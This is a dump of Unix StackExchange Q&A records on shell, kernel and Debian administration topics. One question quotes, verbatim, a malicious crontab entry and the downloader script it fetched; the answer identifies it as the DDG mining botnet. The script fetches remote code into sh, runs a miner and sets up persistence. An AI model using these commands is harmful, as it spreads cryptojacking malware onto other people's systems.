source_id
int64
1
74.7M
question
stringlengths
0
40.2k
response
stringlengths
0
111k
metadata
dict
543,256
I have the follow data set name a.txt with 9003 rows: 571 43544000424023503222572 43504442020202303202573 40340440323043033204574 40303445340343505242... ...16078 5020000002332200020216079 3323350032045230025216080 0420033023353205050216081 30200400323435434202 I want to get a data file with values in the first column right aligned, the second column beginnig in the same field for all rows and one space between first and second column, this way: 571 435440004240235032225 572 435044420202023032022 573 403404403230430332040 574 403034453403435052423... ...16078 50200000023322000202116079 33233500320452300252116080 04200330233532050502316081 302004003234354342024 I am trying this code: awk '{printf "%-5s \n", $1,$2}' a.txt | # -5 indicate the maximum number of characters in the first columnexpand > b.txt The second column beginnig in the right place, however the first column was left aligned in the output, as below: 571 43544000424023503222572 43504442020202303202573 40340440323043033204574 40303445340343505242... ...16078 5020000002332200020216079 3323350032045230025216080 0420033023353205050216081 30200400323435434202 Can you help me with this? Thanks in advance.
You don't need the - flag (left-align), the default alignment is right-align: awk '{printf "%5s %s\n",$1,$2}' a.txt
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/543256", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/362318/" ] }
543,291
A few days ago I learned, that I can use "\ej": history-search-backward"\ek": history-search-forward for avoiding the arrow keys. Now while that works like a charm and i began to read the bash-docs to learn more about .inputrc.Please have a look at this page ( especially the part about keybindings.) https://www.gnu.org/software/bash/manual/html_node/Readline-Init-File-Syntax.html#Readline-Init-File-Syntax \e is mentioned as "an escape character". While english is not my first language I would never assume this could be used to map Alt. That's an ongoing scheme with me and documentation. They somewhat feel more examplatory than explanatory to me.The question is: Where is that stuff actually written down, so that others could have know about and give the Tip in the first place?
The mapping of the Alt key to Escape (ASCII 033, "\e" ) is done by your terminal emulator, the readline library (which handles the ~/.inputrc ) has no part in it. The problem is that there is no way to send the actual key events to a program running in a terminal; the terminal will convert them into sequences of bytes which the program can read from the tty. For the Alt/Meta key, there are two ways to do it: Map it to Escape (ASCII 033 / 0x1b) -- pressing Alt-K will actually send "\ek" , Alt-Shift-K "\eK" , etc. This is the default in most terminal emulators, but it's usually configurable and you have all the reasons to make it the default if it already isn't. Turn on the high 7th bit on the ASCII value of the key -- pressing Alt-K will actually send the 0x6b | 0x80 = 0xeb byte, 0x6b being the ASCII value of "k" . It's the latter which is recognized as "\M-k" in readline bindings. And that does not work and is horribly broken with any multibyte locales like en_US.UTF-8 (which are the default on most modern systems). On such system, the terminal emulator may not send the raw 0xeb byte (which is not a valid UTF-8 sequence, but binary garbage), but may convert it from ISO-8859-1 to UTF-8, resulting in the "\xc3\xab" = "ë" ( e with diaeresis) being sent when Alt-K is pressed. But readline doesn't know how to map "ë" back to "\M-k" no matter how much you fiddle with the plethora of options like convert-meta , enable-meta-key , input-meta , etc. And even if you could do it, that would still be broken, because people may actually want to type "ë" and "ó" and will not appreciate those being handled as unrelated keys like Alt-K and Alt-S .
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/543291", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/358708/" ] }
543,451
I want to add ; in the end of lines in a txt file containing ddl for multiple tables. For example : LOCATION: 'hdfs://HDP**/apps/hive/warehouse/bps_uat.db/maaa' As per above, I need to add ; in the end of all such lines.
In addition to Freddy's answer, you can use the :global command. For example: :g/maaa/norm A; Which means: :g/ " On each line matching this regex:maaa " 'maaa'norm A; " Run 'A;' as if I had manually typed You'll have to adjust 'maaa' to whatever you need, since it's not clear from your question which lines you want to apply this to. :g/hdfs/norm A; for example will append a semicolon to any line containing the text "hdfs".
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/543451", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/374111/" ] }
543,462
we have redhat servers - 7.2 the following output from sar print all relevant details as the following sar -p -d 1 107:16:35 PM DEV tps rd_sec/s wr_sec/s avgrq-sz avgqu-sz await svctm %util07:16:36 PM sda 13.00 0.00 120.00 9.23 0.04 3.08 1.38 1.8007:16:36 PM vg_livecd-lv_root 15.00 0.00 120.00 8.00 0.05 3.07 1.27 1.9007:16:36 PM vg_livecd-lv_swap 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.0007:16:36 PM vg_livecd-lv_home 0.00 0.00 0.00 0.00 0.00 0.00 we want now to add the hostname of the machine in the beginning of each line first we found the hostname hostname=` hostname `echo $hostnameserver_mng14 expected results sar -p -d 1 1server_mng14 07:16:35 PM DEV tps rd_sec/s wr_sec/s avgrq-sz avgqu-sz await svctm %utilserver_mng14 07:16:36 PM sda 13.00 0.00 120.00 9.23 0.04 3.08 1.38 1.80server_mng14 07:16:36 PM vg_livecd-lv_root 15.00 0.00 120.00 8.00 0.05 3.07 1.27 1.90server_mng14 07:16:36 PM vg_livecd-lv_swap 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00server_mng14 07:16:36 PM vg_livecd-lv_home 0.00 0.00 0.00 0.00 0.00 0.00 what we need to pipe after - sar -p -d 1 1 in order to get the hostname of the beginning of each line?
You could run: sar -p -d 1 1 | sed "s/^/$(hostname) /"
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/543462", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/237298/" ] }
543,541
I frequently want to do something like this: cat file | command > file (which obviously doesn't work). The only solution I've seen for this is sponge , i.e. cat file | command | sponge file Unfortunately, sponge is not available to me (nor can I install it or any other package). Is there a more standard quick way to do this without having to break it up every time into multiple commands (pipe to temp file, pipe back to original, delete temp file)? I tried tee for example, and it seems to work, but is it a consistent/safe solution?
A shell function replacing sponge : mysponge () ( append=false while getopts 'a' opt; do case $opt in a) append=true ;; *) echo error; exit 1 esac done shift "$(( OPTIND - 1 ))" outfile=$1 tmpfile=$(mktemp "$(dirname "$outfile")/tmp-sponge.XXXXXXXX") && cat >"$tmpfile" && if "$append"; then cat "$tmpfile" >>"$outfile" else if [ -f "$outfile" ]; then chmod --reference="$outfile" "$tmpfile" fi if [ -f "$outfile" ]; then mv "$tmpfile" "$outfile" elif [ -n "$outfile" ] && [ ! -e "$outfile" ]; then cat "$tmpfile" >"$outfile" else cat "$tmpfile" fi fi && rm -f "$tmpfile") This mysponge shell function passes all data available on standard input on to a temporary file. When all data has been redirected to the temporary file, the collected data is copied to the file named by the function's argument. If data is not to be appended to the file (i.e -a is not used), and if the given output filename refers to an existing regular file, if it does not exist, then this is done with mv (in the case that the file is an existing regular file, an attempt is made to transfer the file modes to the temporary file using GNU chmod first). If the output is to something that is not a regular file (a named pipe, standard output etc.), the data is outputted with cat . If no file was given on the command line, the collected data is sent to standard output. At the end, the temporary file is removed. Each step in the function relies on the successful completion of the previous step. No attempt is made to remove the temporary file if one command fails (it may contain important data). If the named file does not exist, then it will be created with the user's default permissions etc., and the data arriving from standard input will be written to it. The mktemp utility is not standard, but it is commonly available. The above function mimics the behaviour described in the manual for sponge from the moreutils package on Debian. Using tee in place of sponge would not be a viable option. You say that you've tried it and it seemed to work for you. It may work and it may not. It relies on the timing of when the commands in the pipeline are started (they are started pretty much concurrently), and the size of the input data file. The following is an example showing a situation where using tee would not work. The original file is 200000 bytes, but after the pipeline, it's truncated to 32 KiB (which could well correspond to some buffer size on my system). $ yes | head -n 100000 >hello$ ls -l hello-rw-r--r-- 1 kk wheel 200000 Jan 10 09:45 hello $ cat hello | tee hello >/dev/null$ ls -l hello-rw-r--r-- 1 kk wheel 32768 Jan 10 09:46 hello
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/543541", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/286431/" ] }
543,576
I am trying to modprobe wireguard as root, and it fails with: modprobe: ERROR: could not insert 'wireguard': Operation not permitted Adding verbose I get one more line: [root@localhost ben]# insmod /lib/modules/5.2.11-100.fc29.x86_64/extra/wireguard.ko.xzinsmod: ERROR: could not insert module /lib/modules/5.2.11-100.fc29.x86_64/extra/wireguard.ko.xz: Operation not permitted dkms runs fine without error. I've also disabled selinux and that made no difference. I don't see anything in the journalctl logs. Looking through man pages and Google have not turned anything up. I did find this helpful line in dmesg : Lockdown: modprobe: Loading of unsigned module is restricted; see man kernel_lockdown.7 However that man page does not exist. How can I debug this? Any pointers on where to go next?
Finally found something on it. It appears to be a "feature" where unsigned code can't be loaded into the kernel when UEFI secure boot is enabled (which it is). To get the module loading, disable kernel lockdown via sys-rq: # echo 1 > /proc/sys/kernel/sysrq# echo x > /proc/sysrq-trigger Then modprobe should work: modprobe wireguard For more information, see: https://mjg59.dreamwidth.org/50577.html https://bugzilla.redhat.com/show_bug.cgi?id=1599197
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/543576", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/34855/" ] }
543,601
After running below command i got error: # apt-get install linux-headers-$(uname -r)Reading package lists... DoneBuilding dependency treeReading state information... DoneE: Unable to locate package linux-headers-4.9.0-3-amd64E: Couldn't find any package by glob 'linux-headers-4.9.0-3-amd64'E: Couldn't find any package by regex 'linux-headers-4.9.0-3-amd64' To troubleshoot i checked following: # apt-cache search linux-headersaufs-dkms - DKMS files to build and install aufslinux-libc-dev-arm64-cross - Linux Kernel Headers for development (for cross-compiling)linux-libc-dev-armel-cross - Linux Kernel Headers for development (for cross-compiling)linux-libc-dev-armhf-cross - Linux Kernel Headers for development (for cross-compiling)linux-libc-dev-mips-cross - Linux Kernel Headers for development (for cross-compiling)linux-libc-dev-mips64el-cross - Linux Kernel Headers for development (for cross-compiling)linux-libc-dev-mipsel-cross - Linux Kernel Headers for development (for cross-compiling)linux-libc-dev-ppc64el-cross - Linux Kernel Headers for development (for cross-compiling)linux-libc-dev-s390x-cross - Linux Kernel Headers for development (for cross-compiling)linux-libc-dev-alpha-cross - Linux Kernel Headers for development (for cross-compiling)linux-libc-dev-hppa-cross - Linux Kernel Headers for development (for cross-compiling)linux-libc-dev-m68k-cross - Linux Kernel Headers for development (for cross-compiling)linux-libc-dev-mips64-cross - Linux Kernel Headers for development (for cross-compiling)linux-libc-dev-powerpc-cross - Linux Kernel Headers for development (for cross-compiling)linux-libc-dev-powerpcspe-cross - Linux Kernel Headers for development (for cross-compiling)linux-libc-dev-ppc64-cross - Linux Kernel Headers for development (for cross-compiling)linux-libc-dev-sh4-cross - Linux Kernel Headers for development (for cross-compiling)linux-libc-dev-sparc64-cross - Linux Kernel Headers for development (for cross-compiling)linux-headers-4.9.0-11-all - All header files for Linux 4.9 (meta-package)linux-headers-4.9.0-11-all-amd64 - All header files for Linux 4.9 (meta-package)linux-headers-4.9.0-11-amd64 - Header files for Linux 4.9.0-11-amd64linux-headers-4.9.0-11-common - Common header files for Linux 4.9.0-11linux-headers-4.9.0-11-common-rt - Common header files for Linux 4.9.0-11-rtlinux-headers-4.9.0-11-rt-amd64 - Header files for Linux 4.9.0-11-rt-amd64linux-headers-amd64 - Header files for Linux amd64 configuration (meta-package)linux-headers-rt-amd64 - Header files for Linux rt-amd64 configuration (meta-package)```and # apt-cache search linux-imagelinux-headers-4.9.0-11-amd64 - Header files for Linux 4.9.0-11-amd64linux-headers-4.9.0-11-rt-amd64 - Header files for Linux 4.9.0-11-rt-amd64linux-image-4.9.0-11-amd64 - Linux 4.9 for 64-bit PCslinux-image-4.9.0-11-amd64-dbg - Debug symbols for linux-image-4.9.0-11-amd64linux-image-4.9.0-11-rt-amd64 - Linux 4.9 for 64-bit PCs, PREEMPT_RTlinux-image-4.9.0-11-rt-amd64-dbg - Debug symbols for linux-image-4.9.0-11-rt-amd64linux-image-amd64 - Linux for 64-bit PCs (meta-package)linux-image-amd64-dbg - Debugging symbols for Linux amd64 configuration (meta-package)linux-image-rt-amd64 - Linux for 64-bit PCs (meta-package), PREEMPT_RTlinux-image-rt-amd64-dbg - Debugging symbols for Linux rt-amd64 configuration (meta-package)linux-image-4.9.0-3-amd64 - Linux 4.9 for 64-bit PCs After running apt-cache search linux-image i get linux-image-4.9.0-3-amd64 kernal version which i want in the result of apt-cache search linux-headers command also. Few people suggested to change sources.list and then try. But as i am new to this i don't have idea how to search proper link for sources.list and what will be best suited to resolve my problem. I did search on google but did not find solution. Any link or solution which can provide solution will be of great help.
For apt-get install linux-headers-$(uname -r) to work, you need to be running a kernel which is still available from the distribution repositories; in most cases, this basically means you need to be running the latest supported kernel for your distribution. On Debian, the simplest option is apt-get updateapt-get install linux-image-amd64 linux-headers-amd64 (adjust to your architecture) to get the current kernel and matching headers, then reboot.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/543601", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/264177/" ] }
543,614
In the dd command, we can use skip to skip n byte in a file. From nth byte to end of file is copied. But I want to copy binary data from 1228 to 1331 only. How do I achieve this with dd on Linux?
Use the count to specify the number of bytes to copy. Use the shell to do the calculation. Use ibs=1 to set the input block size to 1, so the skip and count are specified in bytes. dd ibs=1 skip=1228 count=$((1331-1228+1)) As 1228 and 1331-1228+1 are both multiples of 4 it would be possible to set the input block size to 4, which would make things more efficient but unless this was going to be used an enormous number of times the optimization will be lost in the noise. Other things like pre-calculating the result of 1331-1228+1 should be done first. dd ibs=4 skip=$((1228/4)) count=$(((1331-1228+1)/4))
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/543614", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/367539/" ] }
543,792
In the bash shell, we can define a function f with f(){ echo Hello; } and then redeclare/override it, without any error or warning messages, with f(){ echo Bye; } I believe there is a way to protect functions from being overridden in this way.
You may declare a function foo as a read-only function using readonly -f foo or declare -g -r -f foo ( readonly is equivalent to declare -g -r ). It's the -f option to these built-in utilities that makes them act on foo as the name of a function, rather than on the variable foo . $ foo () { echo Hello; }$ readonly -f foo$ foo () { echo Bye; }bash: foo: readonly function$ unset -f foobash: unset: foo: cannot unset: readonly function$ fooHello As you can see, making the function read-only not only protects it from getting overridden, but also protects it from being unset (removed completely). Currently (as of bash-5.0.11 ), trying to modify a read-only function would not terminate the shell if one is using the errexit shell option ( set -e ). Chet, the bash maintainer, says that this is an oversight and that it will be changed with the next release. Update: This was fixed during October 2019 for bash-5.1-alpha , so any bash release 5.1 or later would exit properly if an attempt to modify a read-only function is made while the errexit shell option is active.
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/543792", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/156608/" ] }
544,299
I am going to parse data googleapis.txt bucket,abc-def-ghi-45gjd4-wwxisbucket,dde-wwq-ooi-66ciow-po22qinstance,jkl-mno-1-zzz-68dkakw-oo9w8disk,pqr-stu-10-kuy-l2oxapw-rp4lt I expect the result like these below bucket,abc-def-ghibucket,dde-wwq-ooiinstance,jkl-mno-1-zzzdisk,pqr-stu-10-kuy I am thinking that i have to change - to be a space and then run this command cat googleapis.txt | awk '{$NF="";sub(/[ \t]+$/,"")}1' | awk '{$NF="";sub(/[ \t]+$/,"")}1' I got that from this https://stackoverflow.com/a/27794421/8162936 After parsed, i will change the space to be a hypen - back. Does anyone know the best practice or one-liner shell command to parse it ?Thanks all
with sed you can do: sed -E 's/(-[^-]*){2}$//' infile match a pattern like -anything twice (...){2} from end $ of every line and remove it.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/544299", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/273477/" ] }
544,373
I'm looking for the zsh equivalent of the bash command history -c , in other words, clear the history for the current session. In zsh history -c returns 1 with an error message history: bad option: -c . Just to clarify, I'm not looking for a way to delete the contents of $HISTFILE , I just want a command to reset the history to the same state it was in when I opened the terminal. Deleting the contents of $HISTFILE does the opposite of what I want: it deletes the history I want to preserve and preserves the history I want to delete (since current session's history would get appended to it, regardless if its contents was previously erased). There is a workaround I use for now, but it's obviously less than ideal: in the current session I set HISTFILE=/dev/null and just close and reopen the terminal. This causes the history of the closed session not be appended to $HISTFILE . However, I'd really like something like history -c from bash, which is much more elegant than having to close and restart the terminal.
To get an empty history, temporarily set HISTSIZE to zero. function erase_history { local HISTSIZE=0; }erase_history If you want to erase the new history from this shell instance but keep the old history that was loaded initially, empty the history as above then reload the saved history fc -R afterwards. If you don't want the erase_history call to be recorded in the history, you can filter it out in the zshaddhistory hook . function zshaddhistory_erase_history { [[ $1 != [[:space:]]#erase_history[[:space:]]# ]]}zshaddhistory_functions+=(zshaddhistory_erase_history) Deleting one specific history element ( history -d NUM in bash) is another matter. I don't think there's a way other than: Save the history: fc -AI to append to the history file, or fc -WI to overwrite the history file, depending on your history sharing preferences. Edit the history file ( $HISTFILE ). Reload the history file: fc -R .
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/544373", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/325952/" ] }
544,428
I've noticed a lot of questions and answers and comments expressing disdain for (and sometimes even fear of) writing scripts instead of one-liners. So, I'd like to know: When and why should I write a stand-alone script rather than a "one-liner"? Or vice-versa? What are the use-cases and pros & cons of both? Are some languages (e.g. awk or perl) better suited to one-liners than others (e.g. python)? If so, why? Is it just a matter of personal preference or are there good (i.e. objective) reasons to write one or the other in particular circumstances? What are those reasons? Definitions one-liner : any sequence of commands typed or pasted directly into a shell command-line . Often involving pipelines and/or use of languages such as sed , awk , perl , and/or tools like grep or cut or sort . It is the direct execution on the command-line that is the defining characteristic - the length and formatting is irrelevant. A "one-liner" may be all on one line, or it may have multiple lines (e.g. sh for loop, or embedded awk or sed code, with line-feeds and indentation to improve readability). script : any sequence of commands in any interpreted language(s) which are saved into a file , and then executed. A script may be written entirely in one language, or it may be a shell-script wrapper around multiple "one-liners" using other languages. I have my own answer (which I'll post later), but I want this to become a canonical Q&A on the subject, not just my personal opinion.
Another response based on practical experience. I would use a one-liner if it was "throw away" code that I could write straight at the prompt. For example, I might use this: for h in host1 host2 host3; do printf "%s\t%s\n" "$h" "$(ssh "$h" uptime)"; done I would use a script if I decided that the code was worth saving. At this point I would add a description at the top of the file, probably add some error checking, and maybe even check it into a code repository for versioning. For example, if I decided that checking the uptime of a set of servers was a useful function that I would use again and again, the one-liner above might be expanded to this: #!/bin/bash# Check the uptime for each of the known set of hosts#########################################################################hosts=(host1 host2 host3)for h in "${hosts[@]}"do printf "%s\t" "$h" uptime=$(ssh -o ConnectTimeout=5 -n "$h" uptime 2>/dev/null) printf "%s\n" "${uptime:-(unreachable)}"done Generalising, one could say One-liner Simple code (i.e. just "a few" statements), written for a specific one-off purpose Code that can be written quickly and easily whenever it is needed Disposable code Script Code that will (probably) be used more than once or twice Complex code requiring more than "a few" statements Code that will need to be maintained by others Code to be understood by others Code to be run unattended (for example, from cron ) I see a fair number of the questions here on unix.SE ask for a one-liner to perform a particular task. Using my examples above, I think that the second is far more understandable than the first, and therefore readers can learn more from it. One solution can be easily derived from the other so in the interests of readability (for future readers) we should probably avoid providing code squeezed into in one line for anything other than the most trivial of solutions.
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/544428", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/7696/" ] }
544,432
Scenario: In version controlled system configuration based on Puppet, Chef etc., it is required to reproduce a certain system state. This is done by explicitly specifying system package versions. Recently we ran into a problem where certain package versions were missing in the Debian repositories. One example: The "patch" package was required in version 2.7.5-1+deb9u1, but only 2.7.5-1+deb9u2 was available. Another, even more severe example: "linux-headers-4.9.0-9-common" is required (due to the associated kernel being installed) and only "linux-headers-4.9.0-11-common" is available. This makes it impossible to reproduce a certain state of a system. The above packages are just examples (which I in fact encountered). I am interested in understanding and solving the general problem. What is the idea behind these updates, 'vanishing' packages and package versions? Where can I get previous versions (not really old versions, but versions that are a couple of weeks old) of Debian packages? It should be possible to automate the installation process in general way.
Being able to reproduce a specific setup, down to the exact version, is your requirement, not Debian’s. Debian only supports a single version of each binary package in any given release; the counterpart of that is that great care is taken to ensure that package updates in any given release don’t introduce regressions, and when such care isn’t possible, to document that fact. Keeping multiple versions of a given package would only increase the support burden and the test requirements: for example, package maintainers would have to test updated packages against all available versions of the libraries they use, instead of only the currently-supported versions... Packages are only updated in a stable release when really necessary, i.e. to fix a serious bug (including security issues). In the kernel’s case, this sometimes means that the kernel ABI changes, and the package name changes as a result of that (to force rebuilds of dependent packages); there are meta-packages which you can pull in instead of hard-coding the ABI ( linux-image-amd64 , linux-headers-amd64 , etc.). There is however a workaround for your situation: every published source and binary package is archived on snapshot.debian.org . When you create a versioned setup, you can pick the corresponding snapshot (for example, one of the September 2019 snapshots ) and use that as your repository URL: deb https://snapshot.debian.org/archive/debian/20190930T084755Z/ buster main If you end up relying on this, please use a caching mirror of some sort, for example Apt-Cacher NG . This will not only reduce the load on the snapshot server, it will ensure that you have a local copy of all the packages you need. (The situation with regards to source packages is slightly more complex, and the archives do carry multiple versions of some source packages in a given release, because of licensing dependencies. But that’s not relevant here. Strictly speaking, Debian does provide multiple versions of some binaries in supported releases: the current version in the current point release, along with any updates in the security repositories and update repositories; the latter are folded in at the next point release. So maintaining a reproducible, version-controlled system configuration is feasible without resorting to snapshots, as long as you update it every time a point release is made.)
{ "score": 7, "source": [ "https://unix.stackexchange.com/questions/544432", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/332954/" ] }
544,594
I have a file (search.patterns) with a list of patterns to be searched into a list of other txt files. search.patterns homedog cat file 1.txt home 3tiger 4lion 1 file 2.txt dolphin 6jaguar 3dog 1 file 3.txt donkey 3cat 4horse 1 so I want the first line of the pattern file to be searched in the file1, the second line searched in the file2 and the third line in file3 Output: home 3dog 1cat 4 I have written some code like this: for f in *.txt; do while IFS= read -r LINE; do grep -f "$LINE" "$f" > "$f.out" done < search.patternsdone However, the output files are empty Any help, highly appreciated,thanks
Using bash : #!/bin/bashfiles=( 'file 1.txt' 'file 2.txt' 'file 3.txt' )while IFS= read -r pattern; do grep -e "$pattern" "${files[0]}" files=( "${files[@]:1}" )done <search.patterns Testing it: $ bash script.shhome 3dog 1cat 4 The script saves the relevant filenames in the files array, and then proceeds to read patterns from the search.patterns file. For each pattern, the first file in the files list is queried. The processed file is then deleted from the files list (yielding a new first filename in the list). If the number of patterns exceeds the number of files in files , there will be errors from grep .
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/544594", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/361114/" ] }
544,635
I'm looking for a file system that stores files by block content, therefore similar files would only take one block. This is for backup purposes. It is, similar to what block-level backup storage proposes such as zbackup, but I'd like a Linux file system that allows to do that transparently.
Assuming your question is about data deduplication, there are a few file systems which support that on Linux: ZFS , with online deduplication (so data is deduplicated as it is stored), but with extreme memory requirements which make the feature hard to use in practice; Btrfs , with “only” out-of-band deduplication , albeit with tightly-integrated processes which provide reasonably quick deduplication after data is stored; SquashFS , but that probably doesn’t fit your requirements because it’s read-only. XFS is supposed to get deduplication at some point, and Btrfs is also supposed to get online deduplication. Keep an eye on Wikipedia’s file system comparison to see when this changes.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/544635", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/316157/" ] }
544,657
I'm connecting to my remote SSH Debian server account with no root privileges. Is there a way to change/set the time from the server's local time (US) to my local time (Poland; Central European Summer Time, GMT+2)?
Yes, in a general way you can use: $ tzselect At the end of the selection it will tell you how to make the change permanent for the session, and for all future sessions. In your case this might be enough: $ TZ='Europe/Warsaw'; export TZ then check with date . If you add that line to .profile you should make that change permanent for your user.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/544657", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/378796/" ] }
544,671
I've already posted this to the Super User exchange, but was told I may find an answer faster here. I'm attempting to add a feature to an application to keep the screen awake while the user is logged in. The reason for this is that I recently implemented touchscreen functionality to allow the user to control the UI through a touchscreen. However, because we have an out-of-date Linux kernel, we have limited touchscreen functionality -- meaning that although the kernel has multitouch events defined, Xorg doesn't respond to touch at all. So I wrote a driver in the background of our Qt4 application to read touch events directly from /dev/input and to generate mouse events in the application. However, because these mouse events are not on a system-level and are contained within the Qt application, they do not keep the screen awake or wake it once the screensaver starts. The goal of the touchscreen is to remove the need of the keyboard and mouse for the user on our product, and not being able to wake the screensaver would kind of make it difficult to use it. The application already has a QTimer setup that fires every 60 seconds (in case some system process changes these settings while the application is being run) to "prevent the screensaver", but after looking at the command it was issuing, it's obvious why it doesn't work, because the command it's using is: xset s on So I changed the timer to instead issue the following commands: xset s offxset s noblankxset -dpms I also tried executing this command to attempt to prevent xdg-screensaver from launching: xwininfo -name "plasma-desktop" | grep "plasma" | cut -d' ' -f4 | xdg-screensaver suspend However, even with these changes, the screensaver eventually appears. Are there other settings I need to disable to prevent this? Assuming the screensaver that's appearing is the result of the OS launching xdg-screensaver , is there a way I could prevent the launching of that application while our application is logged in? Or is there some other way I should go about this? If it matters, we are running Scientific Linux 6.4 (kernel 2.6.32-754). EDIT: Forgot to mention, the desktop environment is KDE4. EDIT: I found a KSS file matching the screensaver that shows up. I tried renaming it, but that just resulting in a blank screensaver showing up in its place. I need to know how to disable the service that is launching it.
Yes, in a general way you can use: $ tzselect At the end of the selection it will tell you how to make the change permanent for the session, and for all future sessions. In your case this might be enough: $ TZ='Europe/Warsaw'; export TZ then check with date . If you add that line to .profile you should make that change permanent for your user.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/544671", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/161697/" ] }
544,690
Just out of curiosity, I am interested in compiling the Linux kernel with both the clang and zapcc compilers; one at a time. I can't find a guide to follow. Only GCC is getting used to compile the Linux kernel. How do I compile the Linux kernel with other compilers?
The kernel build allows you to specify the tools you want to use; for example, to specify the C compiler, set the CC and HOSTCC variables: make CC=clang HOSTCC=clang The build is only expected to succeed with GCC, but there are people interested in using Clang instead , and it is known to work in some circumstances (some Android kernels are built with Clang).
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/544690", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/274717/" ] }
544,811
I wanted to add something to my root crontab file on my Raspberry Pi, and found an entry that seems suspicious to me, searching for parts of it on Google turned up nothing. Crontab entry: */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh The contents of http://103.219.112.66:8000/i.sh are: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinmkdir -p /var/spool/cron/crontabsecho "" > /var/spool/cron/rootecho "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/rootcp -f /var/spool/cron/root /var/spool/cron/crontabs/rootcd /tmptouch /usr/local/bin/writeable && cd /usr/local/bin/touch /usr/libexec/writeable && cd /usr/libexec/touch /usr/bin/writeable && cd /usr/bin/rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeableexport PATH=$PATH:$(pwd)ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4if [ ! -f "xribfa4" ]; then curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4fichmod +x xribfa4/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab - My Linux knowledge is limited, but to me it seems that downloading binaries from an Indonesian server and running them as root regularly is not something that is usual. What is this? What should I do?
It is a DDG mining botnet , how it work : exploiting an RCE vulnerability modifying the crontab downloading the appropriate mining program (written with go) starting the mining process DDG: A Mining Botnet Aiming at Database Servers SystemdMiner when a botnet borrows another botnet’s infrastructure U&L : How can I kill minerd malware on an AWS EC2 instance? (compromised server)
{ "score": 7, "source": [ "https://unix.stackexchange.com/questions/544811", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/141058/" ] }
544,861
Is this the correct way to start multiple sequential processings in the background? for i in {1..10}; do for j in {1..10}; do run_command $i $j; done &done; All j should be processed after each other for a given i , but all i should be processed simultaneously.
The outer loop that you have is basically for i in {1..10}; do some_compound_command &done This would start ten concurrent instances of some_compound_command in the background. They will be started as fast as possible, but not quite "all at the same time" (i.e. if some_compound_command takes very little time, then the first may well finish before the last one starts). The fact that some_compound_command happens to be a loop is not important. This means that the code that you show is correct in that iterations of the inner j -loop will be running sequentially, but all instances of the inner loop (one per iteration of the outer i -loop) would be started concurrently. The only thing to keep in mind is that each background job will be running in a subshell. This means that changes made to the environment (e.g. modifications to values of shell variables, changes of current working directory with cd , etc.) in one instance of the inner loop will not be visible outside of that particular background job. What you may want to add is a wait statement after your loop, just to wait for all background jobs to actually finish, at least before the script terminates: for i in {1..10}; do for j in {1..10}; do run_command "$i" "$j" done &donewait
